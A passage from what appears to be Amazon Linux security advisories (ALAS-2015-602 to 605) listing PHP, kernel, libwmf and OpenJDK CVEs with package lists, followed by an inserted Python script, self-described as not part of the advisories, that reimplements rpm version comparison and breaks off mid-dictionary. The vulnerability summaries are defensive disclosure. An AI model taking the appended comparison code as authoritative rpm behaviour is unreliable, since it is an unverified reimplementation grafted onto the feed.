A NULL pointer dereference flaw was found in the XSLTProcessor class in PHP. An attacker could use this flaw to cause a PHP application to crash if it performed Extensible Stylesheet Language (XSL) transformations using untrusted XSLT files and allowed PHP functions to be used as XSLT functions within XSL stylesheets.
1260711:
CVE-2015-6837 CVE-2015-6838 php: NULL pointer dereference in XSLTProcessor class
CVE-2015-6836:
A flaw was discovered in the way PHP performed object unserialization. Specially crafted input processed by the unserialize() function could cause a PHP application to crash or, possibly, execute arbitrary code.
1260683:
CVE-2015-6836 php: SOAP serialize_function_call() type confusion
CVE-2015-6835:
1260647:
CVE-2015-6835 php: use-after-free vulnerability in session deserializer
CVE-2015-6834:
1260642:
CVE-2015-6834 php: multiple unserialization use-after-free issues
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6834" title="" id="CVE-2015-6834" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6835" title="" id="CVE-2015-6835" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6836" title="" id="CVE-2015-6836" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6837" title="" id="CVE-2015-6837" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6838" title="" id="CVE-2015-6838" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7803" title="" id="CVE-2015-7803" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7804" title="" id="CVE-2015-7804" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="php55-cli" version="5.5.30" release="1.110.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-cli-5.5.30-1.110.amzn1.x86_64.rpm</filename></package><package name="php55-pdo" version="5.5.30" release="1.110.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-pdo-5.5.30-1.110.amzn1.x86_64.rpm</filename></package><package name="php55-odbc" version="5.5.30" release="1.110.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-odbc-5.5.30-1.110.amzn1.x86_64.rpm</filename></package><package name="php55-common" version="5.5.30" release="1.110.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-common-5.5.30-1.110.amzn1.x86_64.rpm</filename></package><package name="php55-tidy" version="5.5.30" release="1.110.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-tidy-5.5.30-1.110.amzn1.x86_64.rpm</filename></package><package name="php55-mbstring" version="5.5.30" release="1.110.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-mbstring-5.5.30-1.110.amzn1.x86_64.rpm</filename></package><package 
name="php55-intl" version="5.5.30" release="1.110.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-intl-5.5.30-1.110.amzn1.x86_64.rpm</filename></package><package name="php55-mysqlnd" version="5.5.30" release="1.110.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-mysqlnd-5.5.30-1.110.amzn1.x86_64.rpm</filename></package><package name="php55-mcrypt" version="5.5.30" release="1.110.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-mcrypt-5.5.30-1.110.amzn1.x86_64.rpm</filename></package><package name="php55-fpm" version="5.5.30" release="1.110.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-fpm-5.5.30-1.110.amzn1.x86_64.rpm</filename></package><package name="php55-process" version="5.5.30" release="1.110.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-process-5.5.30-1.110.amzn1.x86_64.rpm</filename></package><package name="php55-dba" version="5.5.30" release="1.110.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-dba-5.5.30-1.110.amzn1.x86_64.rpm</filename></package><package name="php55-pspell" version="5.5.30" release="1.110.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-pspell-5.5.30-1.110.amzn1.x86_64.rpm</filename></package><package name="php55-recode" version="5.5.30" release="1.110.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-recode-5.5.30-1.110.amzn1.x86_64.rpm</filename></package><package name="php55-mssql" version="5.5.30" release="1.110.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-mssql-5.5.30-1.110.amzn1.x86_64.rpm</filename></package><package name="php55-debuginfo" version="5.5.30" release="1.110.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-debuginfo-5.5.30-1.110.amzn1.x86_64.rpm</filename></package><package name="php55-bcmath" version="5.5.30" release="1.110.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-bcmath-5.5.30-1.110.amzn1.x86_64.rpm</filename></package><package name="php55-xml" version="5.5.30" release="1.110.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/php55-xml-5.5.30-1.110.amzn1.x86_64.rpm</filename></package><package name="php55-imap" version="5.5.30" release="1.110.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-imap-5.5.30-1.110.amzn1.x86_64.rpm</filename></package><package name="php55-opcache" version="5.5.30" release="1.110.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-opcache-5.5.30-1.110.amzn1.x86_64.rpm</filename></package><package name="php55-soap" version="5.5.30" release="1.110.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-soap-5.5.30-1.110.amzn1.x86_64.rpm</filename></package><package name="php55" version="5.5.30" release="1.110.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-5.5.30-1.110.amzn1.x86_64.rpm</filename></package><package name="php55-xmlrpc" version="5.5.30" release="1.110.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-xmlrpc-5.5.30-1.110.amzn1.x86_64.rpm</filename></package><package name="php55-embedded" version="5.5.30" release="1.110.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-embedded-5.5.30-1.110.amzn1.x86_64.rpm</filename></package><package name="php55-snmp" version="5.5.30" release="1.110.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-snmp-5.5.30-1.110.amzn1.x86_64.rpm</filename></package><package name="php55-devel" version="5.5.30" release="1.110.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-devel-5.5.30-1.110.amzn1.x86_64.rpm</filename></package><package name="php55-enchant" version="5.5.30" release="1.110.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-enchant-5.5.30-1.110.amzn1.x86_64.rpm</filename></package><package name="php55-gd" version="5.5.30" release="1.110.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-gd-5.5.30-1.110.amzn1.x86_64.rpm</filename></package><package name="php55-gmp" version="5.5.30" release="1.110.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-gmp-5.5.30-1.110.amzn1.x86_64.rpm</filename></package><package name="php55-ldap" 
version="5.5.30" release="1.110.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-ldap-5.5.30-1.110.amzn1.x86_64.rpm</filename></package><package name="php55-pgsql" version="5.5.30" release="1.110.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-pgsql-5.5.30-1.110.amzn1.x86_64.rpm</filename></package><package name="php55-embedded" version="5.5.30" release="1.110.amzn1" epoch="0" arch="i686"><filename>Packages/php55-embedded-5.5.30-1.110.amzn1.i686.rpm</filename></package><package name="php55-bcmath" version="5.5.30" release="1.110.amzn1" epoch="0" arch="i686"><filename>Packages/php55-bcmath-5.5.30-1.110.amzn1.i686.rpm</filename></package><package name="php55-snmp" version="5.5.30" release="1.110.amzn1" epoch="0" arch="i686"><filename>Packages/php55-snmp-5.5.30-1.110.amzn1.i686.rpm</filename></package><package name="php55-cli" version="5.5.30" release="1.110.amzn1" epoch="0" arch="i686"><filename>Packages/php55-cli-5.5.30-1.110.amzn1.i686.rpm</filename></package><package name="php55-mbstring" version="5.5.30" release="1.110.amzn1" epoch="0" arch="i686"><filename>Packages/php55-mbstring-5.5.30-1.110.amzn1.i686.rpm</filename></package><package name="php55-ldap" version="5.5.30" release="1.110.amzn1" epoch="0" arch="i686"><filename>Packages/php55-ldap-5.5.30-1.110.amzn1.i686.rpm</filename></package><package name="php55-pgsql" version="5.5.30" release="1.110.amzn1" epoch="0" arch="i686"><filename>Packages/php55-pgsql-5.5.30-1.110.amzn1.i686.rpm</filename></package><package name="php55-pdo" version="5.5.30" release="1.110.amzn1" epoch="0" arch="i686"><filename>Packages/php55-pdo-5.5.30-1.110.amzn1.i686.rpm</filename></package><package name="php55-pspell" version="5.5.30" release="1.110.amzn1" epoch="0" arch="i686"><filename>Packages/php55-pspell-5.5.30-1.110.amzn1.i686.rpm</filename></package><package name="php55-dba" version="5.5.30" release="1.110.amzn1" epoch="0" 
arch="i686"><filename>Packages/php55-dba-5.5.30-1.110.amzn1.i686.rpm</filename></package><package name="php55-common" version="5.5.30" release="1.110.amzn1" epoch="0" arch="i686"><filename>Packages/php55-common-5.5.30-1.110.amzn1.i686.rpm</filename></package><package name="php55-odbc" version="5.5.30" release="1.110.amzn1" epoch="0" arch="i686"><filename>Packages/php55-odbc-5.5.30-1.110.amzn1.i686.rpm</filename></package><package name="php55-enchant" version="5.5.30" release="1.110.amzn1" epoch="0" arch="i686"><filename>Packages/php55-enchant-5.5.30-1.110.amzn1.i686.rpm</filename></package><package name="php55-xml" version="5.5.30" release="1.110.amzn1" epoch="0" arch="i686"><filename>Packages/php55-xml-5.5.30-1.110.amzn1.i686.rpm</filename></package><package name="php55-soap" version="5.5.30" release="1.110.amzn1" epoch="0" arch="i686"><filename>Packages/php55-soap-5.5.30-1.110.amzn1.i686.rpm</filename></package><package name="php55-fpm" version="5.5.30" release="1.110.amzn1" epoch="0" arch="i686"><filename>Packages/php55-fpm-5.5.30-1.110.amzn1.i686.rpm</filename></package><package name="php55-gmp" version="5.5.30" release="1.110.amzn1" epoch="0" arch="i686"><filename>Packages/php55-gmp-5.5.30-1.110.amzn1.i686.rpm</filename></package><package name="php55-xmlrpc" version="5.5.30" release="1.110.amzn1" epoch="0" arch="i686"><filename>Packages/php55-xmlrpc-5.5.30-1.110.amzn1.i686.rpm</filename></package><package name="php55-opcache" version="5.5.30" release="1.110.amzn1" epoch="0" arch="i686"><filename>Packages/php55-opcache-5.5.30-1.110.amzn1.i686.rpm</filename></package><package name="php55-process" version="5.5.30" release="1.110.amzn1" epoch="0" arch="i686"><filename>Packages/php55-process-5.5.30-1.110.amzn1.i686.rpm</filename></package><package name="php55-debuginfo" version="5.5.30" release="1.110.amzn1" epoch="0" arch="i686"><filename>Packages/php55-debuginfo-5.5.30-1.110.amzn1.i686.rpm</filename></package><package name="php55-mcrypt" version="5.5.30" 
release="1.110.amzn1" epoch="0" arch="i686"><filename>Packages/php55-mcrypt-5.5.30-1.110.amzn1.i686.rpm</filename></package><package name="php55" version="5.5.30" release="1.110.amzn1" epoch="0" arch="i686"><filename>Packages/php55-5.5.30-1.110.amzn1.i686.rpm</filename></package><package name="php55-devel" version="5.5.30" release="1.110.amzn1" epoch="0" arch="i686"><filename>Packages/php55-devel-5.5.30-1.110.amzn1.i686.rpm</filename></package><package name="php55-imap" version="5.5.30" release="1.110.amzn1" epoch="0" arch="i686"><filename>Packages/php55-imap-5.5.30-1.110.amzn1.i686.rpm</filename></package><package name="php55-mssql" version="5.5.30" release="1.110.amzn1" epoch="0" arch="i686"><filename>Packages/php55-mssql-5.5.30-1.110.amzn1.i686.rpm</filename></package><package name="php55-mysqlnd" version="5.5.30" release="1.110.amzn1" epoch="0" arch="i686"><filename>Packages/php55-mysqlnd-5.5.30-1.110.amzn1.i686.rpm</filename></package><package name="php55-recode" version="5.5.30" release="1.110.amzn1" epoch="0" arch="i686"><filename>Packages/php55-recode-5.5.30-1.110.amzn1.i686.rpm</filename></package><package name="php55-tidy" version="5.5.30" release="1.110.amzn1" epoch="0" arch="i686"><filename>Packages/php55-tidy-5.5.30-1.110.amzn1.i686.rpm</filename></package><package name="php55-intl" version="5.5.30" release="1.110.amzn1" epoch="0" arch="i686"><filename>Packages/php55-intl-5.5.30-1.110.amzn1.i686.rpm</filename></package><package name="php55-gd" version="5.5.30" release="1.110.amzn1" epoch="0" arch="i686"><filename>Packages/php55-gd-5.5.30-1.110.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-603</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-603: medium priority package update for kernel</title><issued date="2015-10-27 13:40:00" /><updated date="2017-10-13 00:11:00" 
/><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-1000253:
A flaw was found in the way the Linux kernel loaded ELF executables. Provided that an application was built as Position Independent Executable (PIE), the loader could allow part of that application&#039;s data segment to map over the memory area reserved for its stack, potentially resulting in memory corruption. An unprivileged local user with access to SUID (or otherwise privileged) PIE binary could use this flaw to escalate their privileges on the system.
1492212:
CVE-2017-1000253 kernel: load_elf_binary() does not take account of the need to allocate sufficient space for the entire binary
CVE-2015-8787:
A NULL-pointer dereference vulnerability was found in the Linux kernel&#039;s TCP stack, in net/netfilter/nf_nat_redirect.c in the nf_nat_redirect_ipv4() function. A remote, unauthenticated user could exploit this flaw to create a system crash (denial of service).
1300731:
CVE-2015-8787 kernel: Missing NULL pointer check in nf_nat_redirect_ipv4
CVE-2015-7613:
Race condition in the IPC object implementation in the Linux kernel through 4.2.3 allows local users to gain privileges by triggering an ipc_addid call that leads to uid and gid comparisons against uninitialized data, related to msg.c, shm.c, and util.c.
1268270:
CVE-2015-7613 kernel: Unauthorized access to IPC objects with SysV shm
CVE-2015-2925:
1209367:
CVE-2015-2925 Kernel: vfs: Do not allow escaping from bind mounts
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2925" title="" id="CVE-2015-2925" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7613" title="" id="CVE-2015-7613" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8787" title="" id="CVE-2015-8787" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-1000253" title="" id="CVE-2017-1000253" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="kernel-tools-devel" version="4.1.10" release="17.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-4.1.10-17.31.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.1.10" release="17.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-4.1.10-17.31.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="4.1.10" release="17.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-4.1.10-17.31.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="4.1.10" release="17.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-4.1.10-17.31.amzn1.x86_64.rpm</filename></package><package name="kernel" version="4.1.10" release="17.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-4.1.10-17.31.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.1.10" release="17.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.1.10-17.31.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="4.1.10" release="17.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-4.1.10-17.31.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.1.10" release="17.31.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/perf-4.1.10-17.31.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="4.1.10" release="17.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.1.10-17.31.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.1.10" release="17.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-4.1.10-17.31.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="4.1.10" release="17.31.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.1.10-17.31.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.1.10" release="17.31.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-4.1.10-17.31.amzn1.i686.rpm</filename></package><package name="perf-debuginfo" version="4.1.10" release="17.31.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-4.1.10-17.31.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="4.1.10" release="17.31.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-4.1.10-17.31.amzn1.i686.rpm</filename></package><package name="kernel" version="4.1.10" release="17.31.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-4.1.10-17.31.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="4.1.10" release="17.31.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-4.1.10-17.31.amzn1.i686.rpm</filename></package><package name="perf" version="4.1.10" release="17.31.amzn1" epoch="0" arch="i686"><filename>Packages/perf-4.1.10-17.31.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="4.1.10" release="17.31.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-4.1.10-17.31.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="4.1.10" release="17.31.amzn1" epoch="0" 
arch="i686"><filename>Packages/kernel-tools-4.1.10-17.31.amzn1.i686.rpm</filename></package><package name="kernel-tools-devel" version="4.1.10" release="17.31.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-4.1.10-17.31.amzn1.i686.rpm</filename></package><package name="kernel-doc" version="4.1.10" release="17.31.amzn1" epoch="0" arch="noarch"><filename>Packages/kernel-doc-4.1.10-17.31.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-604</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-604: important priority package update for libwmf</title><issued date="2015-10-27 13:51:00" /><updated date="2015-10-27 14:16:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-4696:
It was discovered that libwmf did not properly process certain WMF files. By tricking a victim into opening a specially crafted WMF file in an application using libwmf, a remote attacker could possibly exploit this flaw to cause a crash or execute arbitrary code with the privileges of the user running the application.
CVE-2015-4695:
It was discovered that libwmf did not properly process certain WMF files. By tricking a victim into opening a specially crafted WMF file in an application using libwmf, a remote attacker could possibly exploit this flaw to cause a crash.
CVE-2015-4588:
It was discovered that libwmf did not correctly process certain WMF (Windows Metafiles) with embedded BMP images. By tricking a victim into opening a specially crafted WMF file in an application using libwmf, a remote attacker could possibly use this flaw to execute arbitrary code with the privileges of the user running the application.
CVE-2015-0848:
It was discovered that libwmf did not correctly process certain WMF (Windows Metafiles) with embedded BMP images. By tricking a victim into opening a specially crafted WMF file in an application using libwmf, a remote attacker could possibly use this flaw to execute arbitrary code with the privileges of the user running the application.
CVE-2009-3546:
The _gdGetColors function in gd_gd.c in PHP 5.2.11 and 5.3.x before 5.3.1, and the GD Graphics Library 2.x, does not properly verify a certain colorsTotal structure member, which might allow remote attackers to conduct buffer overflow or buffer over-read attacks via a crafted GD file, a different vulnerability than CVE-2009-3293. NOTE: some of these details are obtained from third party information.
A missing input sanitization flaw, leading to a buffer overflow, was discovered in the gd library. A specially-crafted GD image file could cause an application using the gd library to crash or, possibly, execute arbitrary code when opened.
A missing input sanitization flaw, leading to a buffer overflow, was discovered in PHP's gd library. A specially-crafted GD image file could cause the PHP interpreter to crash or, possibly, execute arbitrary code when opened.
529213:
CVE-2009-3546 gd: insufficient input validation in _gdGetColors()
CVE-2007-3473:
The gdImageCreateXbm function in the GD Graphics Library (libgd) before 2.0.35 allows user-assisted remote attackers to cause a denial of service (crash) via unspecified vectors involving a gdImageCreate failure.
A flaw was discovered in the gd X BitMap (XBM) image-handling code. A malformed or truncated XBM image could cause a crash in an application using the gd library.
276791:
CVE-2007-3473 libgd NULL pointer dereference when reading a corrupt X bitmap
CVE-2007-3472:
Integer overflow in gdImageCreateTrueColor function in the GD Graphics Library (libgd) before 2.0.35 allows user-assisted remote attackers to have unspecified attack vectors and impact.
An integer overflow was discovered in the gdImageCreateTrueColor() function, leading to incorrect memory allocations. A carefully crafted image could cause a crash or possibly execute code with the privileges of the application using the gd library.
276751:
CVE-2007-3472 libgd Integer overflow in TrueColor code
CVE-2007-2756:
The gdPngReadData function in libgd 2.0.34 allows user-assisted attackers to cause a denial of service (CPU consumption) via a crafted PNG image with truncated data, which causes an infinite loop in the png_read_info function in libpng.
An infinite-loop flaw was discovered in the PHP gd extension. A script that could be forced to process PNG images from an untrusted source could allow a remote attacker to cause a denial of service.
A flaw was discovered in the gd PNG image handling code. A truncated PNG image could cause an infinite loop in an application using the gd library.
242033:
CVE-2007-2756 gd / php-gd ImageCreateFromPng infinite loop caused by truncated PNG
CVE-2007-0455:
Buffer overflow in the gdImageStringFTEx function in gdft.c in GD Graphics Library 2.0.33 and earlier allows remote attackers to cause a denial of service (application crash) and possibly execute arbitrary code via a crafted string with a JIS encoded font.
A buffer over-read flaw was discovered. This could cause a crash in an application using the gd library to render certain strings using a JIS-encoded font.
A buffer over-read flaw was discovered in PHP's gd extension. A script that could be forced to write an arbitrary string using a JIS font from an untrusted source could cause the PHP interpreter to crash.
224607:
CVE-2007-0455 gd buffer overrun
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0455" title="" id="CVE-2007-0455" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2756" title="" id="CVE-2007-2756" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3472" title="" id="CVE-2007-3472" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3473" title="" id="CVE-2007-3473" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3546" title="" id="CVE-2009-3546" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0848" title="" id="CVE-2015-0848" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4588" title="" id="CVE-2015-4588" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4695" title="" id="CVE-2015-4695" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4696" title="" id="CVE-2015-4696" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2015:1917.html" title="" id="RHSA-2015:1917" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="libwmf-lite" version="0.2.8.4" release="41.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/libwmf-lite-0.2.8.4-41.11.amzn1.x86_64.rpm</filename></package><package name="libwmf-devel" version="0.2.8.4" release="41.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/libwmf-devel-0.2.8.4-41.11.amzn1.x86_64.rpm</filename></package><package name="libwmf-debuginfo" version="0.2.8.4" release="41.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/libwmf-debuginfo-0.2.8.4-41.11.amzn1.x86_64.rpm</filename></package><package name="libwmf" version="0.2.8.4" release="41.11.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/libwmf-0.2.8.4-41.11.amzn1.x86_64.rpm</filename></package><package name="libwmf-debuginfo" version="0.2.8.4" release="41.11.amzn1" epoch="0" arch="i686"><filename>Packages/libwmf-debuginfo-0.2.8.4-41.11.amzn1.i686.rpm</filename></package><package name="libwmf-devel" version="0.2.8.4" release="41.11.amzn1" epoch="0" arch="i686"><filename>Packages/libwmf-devel-0.2.8.4-41.11.amzn1.i686.rpm</filename></package><package name="libwmf" version="0.2.8.4" release="41.11.amzn1" epoch="0" arch="i686"><filename>Packages/libwmf-0.2.8.4-41.11.amzn1.i686.rpm</filename></package><package name="libwmf-lite" version="0.2.8.4" release="41.11.amzn1" epoch="0" arch="i686"><filename>Packages/libwmf-lite-0.2.8.4-41.11.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-605</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-605: critical priority package update for java-1.7.0-openjdk</title><issued date="2015-10-27 13:52:00" /><updated date="2015-10-27 14:14:00" /><severity>critical</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-4911:
Multiple denial of service flaws were found in the JAXP component in OpenJDK. A specially crafted XML file could cause a Java application using JAXP to consume an excessive amount of CPU and memory when parsed.
CVE-2015-4903:
Multiple flaws were found in the Libraries, 2D, CORBA, JAXP, JGSS, and RMI components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass certain Java sandbox restrictions.
CVE-2015-4893:
Multiple denial of service flaws were found in the JAXP component in OpenJDK. A specially crafted XML file could cause a Java application using JAXP to consume an excessive amount of CPU and memory when parsed.
CVE-2015-4883:
Multiple flaws were discovered in the CORBA, Libraries, RMI, Serialization, and 2D components in OpenJDK. An untrusted Java application or applet could use these flaws to completely bypass Java sandbox restrictions.
CVE-2015-4882:
Multiple flaws were found in the Libraries, 2D, CORBA, JAXP, JGSS, and RMI components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass certain Java sandbox restrictions.
CVE-2015-4881:
Multiple flaws were discovered in the CORBA, Libraries, RMI, Serialization, and 2D components in OpenJDK. An untrusted Java application or applet could use these flaws to completely bypass Java sandbox restrictions.
CVE-2015-4872:
It was discovered that the Security component in OpenJDK failed to properly check if a certificate satisfied all defined constraints. In certain cases, this could cause a Java application to accept an X.509 certificate which does not meet requirements of the defined policy.
CVE-2015-4860:
Multiple flaws were discovered in the CORBA, Libraries, RMI, Serialization, and 2D components in OpenJDK. An untrusted Java application or applet could use these flaws to completely bypass Java sandbox restrictions.
CVE-2015-4844:
Multiple flaws were discovered in the CORBA, Libraries, RMI, Serialization, and 2D components in OpenJDK. An untrusted Java application or applet could use these flaws to completely bypass Java sandbox restrictions.
CVE-2015-4843:
Multiple flaws were discovered in the CORBA, Libraries, RMI, Serialization, and 2D components in OpenJDK. An untrusted Java application or applet could use these flaws to completely bypass Java sandbox restrictions.
CVE-2015-4842:
Multiple flaws were found in the Libraries, 2D, CORBA, JAXP, JGSS, and RMI components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass certain Java sandbox restrictions.
CVE-2015-4840:
Multiple flaws were found in the Libraries, 2D, CORBA, JAXP, JGSS, and RMI components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass certain Java sandbox restrictions.
CVE-2015-4835:
Multiple flaws were discovered in the CORBA, Libraries, RMI, Serialization, and 2D components in OpenJDK. An untrusted Java application or applet could use these flaws to completely bypass Java sandbox restrictions.
CVE-2015-4806:
Multiple flaws were found in the Libraries, 2D, CORBA, JAXP, JGSS, and RMI components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass certain Java sandbox restrictions.
CVE-2015-4805:
Multiple flaws were discovered in the CORBA, Libraries, RMI, Serialization, and 2D components in OpenJDK. An untrusted Java application or applet could use these flaws to completely bypass Java sandbox restrictions.
CVE-2015-4803:
Multiple denial of service flaws were found in the JAXP component in OpenJDK. A specially crafted XML file could cause a Java application using JAXP to consume an excessive amount of CPU and memory when parsed.
CVE-2015-4734:
Multiple flaws were found in the Libraries, 2D, CORBA, JAXP, JGSS, and RMI components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass certain Java sandbox restrictions.
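Turning the package lists of ALAS-2015-602 to ALAS-2015-605 above into a host check, as an added example that is not part of the advisory text or of any Amazon tooling: the script reimplements rpm's rpmvercmp ordering in Python (an assumption about rpm's algorithm, written from its documented rules rather than taken from this feed), compares each host package's (epoch, version, release) against the fixed EVR transcribed from the pkglist entries of those four advisories, and judges the kernel advisory by the running kernel rather than by what happens to be installed. The installed-package sample and the uname -r string are constructed for the example; a real run would feed in the output of rpm -qa with the query format shown in the comment.

```python
import re

# Runs of digits, runs of letters, or a tilde; everything else is a separator.
_SEG = re.compile(r"[0-9]+|[A-Za-z]+|~")


def rpmvercmp(a, b):
    """Order two version or release strings the way rpm's rpmvercmp() does
    (reimplemented here from the documented rules, not imported from rpm):
    numeric segments compare as integers, alphabetic segments lexically, a
    numeric segment beats an alphabetic one, extra trailing segments make a
    string newer, and a tilde sorts before anything, even end of string.
    Returns 1 if a is newer, -1 if older, 0 if equal."""
    if a == b:
        return 0
    sa, sb = _SEG.findall(a), _SEG.findall(b)
    for x, y in zip(sa, sb):
        if x == "~" or y == "~":
            if x == y:
                continue
            return -1 if x == "~" else 1
        if x.isdigit() and y.isdigit():
            xi, yi = int(x), int(y)
            if xi != yi:
                return 1 if xi > yi else -1
        elif x.isdigit() != y.isdigit():
            return 1 if x.isdigit() else -1
        elif x != y:
            return 1 if x > y else -1
    if len(sa) == len(sb):
        return 0
    if len(sa) > len(sb):
        return -1 if sa[len(sb)] == "~" else 1
    return 1 if sb[len(sa)] == "~" else -1


def evr_cmp(a, b):
    """Compare two (epoch, version, release) tuples: epoch first, as an
    integer, then version, then release."""
    ea, eb = int(a[0]), int(b[0])
    if ea != eb:
        return 1 if ea > eb else -1
    c = rpmvercmp(a[1], b[1])
    return c if c != 0 else rpmvercmp(a[2], b[2])


# Fixed EVRs transcribed from the advisories' pkglist entries; one package per
# advisory is enough because every binary in a pkglist shares the same EVR.
FIXED = {
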